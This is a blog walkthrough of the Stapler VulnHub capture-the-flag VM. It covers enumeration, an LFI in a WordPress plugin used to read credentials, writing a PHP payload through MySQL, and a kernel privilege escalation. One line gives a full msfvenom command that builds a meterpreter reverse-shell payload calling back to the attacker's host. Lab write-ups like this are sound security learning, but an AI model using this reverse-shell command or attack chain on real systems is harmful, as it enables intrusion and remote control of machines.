Sunday, 12 June 2016

Stapler CTF Walkthrough

Stapler is the VulnHub VM used in their workshop at BSides London. For anyone not able to attend (myself included), the VM is hosted on VulnHub along with the workshop slides.

Enumeration

Running netdiscover -r 10.0.2.0/24 gets the IP of the target machine.


Running NMap shows quite a few open ports. 



A quick check of the website does't reveal anything useful. 



Running NMap with the --script banner flag reveals some more information. 


With a bit more digging, I discovered that FTP was allowing the anonymous account. I was able to log in with anonymous for the username and password:


The note reveals some potential usernames, but not much else. 


NMap also revealed a SMB share, connecting doesn't really provide anything useful, except for a version number for a wordpress install. 



Knowing that there is likely a wordpress install on this box, I started investigating the unknown ports in the NMap result. Port 12380 is running a web server, with a default landing page which is served for every request. 


Switching to HTTPS allows access to the robots.txt file, which lists two directories. 


Obviously, I tried the admin directory first...


I guess this was talked about in the workshop, but it doesn't have anything useful. 

Browsing the blog url provided something useful. A wordpress site with a couple of posts, a registration page and a login page. Trying to register didn't work (no surprise there!). Running WPScan identified the uploads directory had directory listing enabled, which allowed me to find the plugins directory (yes, WPScan does identify these as well). 

Getting a shell

Some searching later reveals that the advanced video  plugin has an LFI exploit.  Running the PoC allows wp-config to be read. 



So the image created by the exploit is corrupt (as it isn't really an image), I used wget to pull the image to my kali machine, using --no-check-certificate to bypass issues with the SSL cert on the target.


Wp-Config provides creds for the mysql server running on the target. 


A shell can be obtained by using 'select into outfile'. I used msfvenom to generate a php meterpreter payload. 

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=4444 -e php/base64 -f raw > shell.php

I was able to find the location of the uploads directory when digging around the wordpress install, so I can  use mysql to create my payload file in that directory. 


I used metasploit to run a /multi/handler listener on my kali machine and loaded the shell.php file. This is when I realised I forgot to add the <?PHP ?> tags to the payload... 

Fixing that problem and using mysql to create another file gave me my shell. 



Privilege Escalation 

The target is running ubuntu 16.4, on kernel version 4.4, searching exploit DB reveals a possible privesc vuln. 


The exploit was successful, and I got my root shell.



The Flag

Root privileges allowed me to grab the flag from /root/



Final Thoughts

The description for this VM says there are several ways to get an initial shell and escalate to root. The slides also hit at multiple flags. I'm looking forward to seeing other peoples methods of rooting this one. I wasn't able to figure out what was going on on port 666, I may come back to this now I have root, but I feel like that would be cheating. There was a lot of enumeration on this box, getting root felt almost trivial compared to getting the initial shell. Overall, this VM felt more realistic than some of the others I've attempted. 

No comments:

Post a Comment